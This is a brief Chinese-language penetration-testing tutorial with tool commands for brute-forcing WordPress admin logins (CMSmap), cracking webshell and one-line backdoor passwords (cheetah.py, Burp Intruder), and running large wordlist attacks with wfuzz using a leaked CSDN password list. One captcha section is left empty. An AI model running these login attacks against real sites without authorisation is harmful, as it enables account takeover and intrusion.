第四節 wordpress博客后台爆破、一句話密碼破解、webshell密碼破解、后台有驗證碼破解


1. wordpress博客的登錄界面一般是根目錄下的wp-login.php

 

2. 使用工具: CMSmap

  下載(kali): git clone https://github.com/dionach/CMSmap

  使用:

    ./cmsmap.py 目標網址  掃描該網站,得出有關信息  每次運行時會自動檢查版本並更新

    ./cmsmap.py 目標網站 -u admin -p 密碼字典的路徑

    ./cmsmap.py -i /root/wp.txt -u admin -p /root/password.txt -v -o w.txt 批量網站掃描

 

3. php,asp,aspx的一句話密碼破解:

  使用工具: cheetah.py

    案例: python cheetah.py -u 一句話的url -n 1000 

 

4. webshell密碼破解:

  a. asp木馬溢出工具(Asp_Overflow.exe)

  b. burpsuite的intruder模塊

  

5. 爆破有驗證碼的后台:

  a. 后台的驗證碼不刷新,可以重復利用的:

    正常爆破

  b. 

    

6. 多線程百萬密碼爆破:

  對於大型的字典,導入需要大量內存,而且burpsuite也無法導入大型字典,此時需要使用別的工具來進行爆破。

  工具: kali中的wfuzz

  exp實例:

    wfuzz -c -z file,/pentest/csdnpass.txt --hc 200 -u url... -d "post要傳的參數,要fuzz的參數把=的后面的內容改成FUZZ"

   -z 表示文件  --hc 表示隱藏狀態為200的結果  -d 表示參數


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM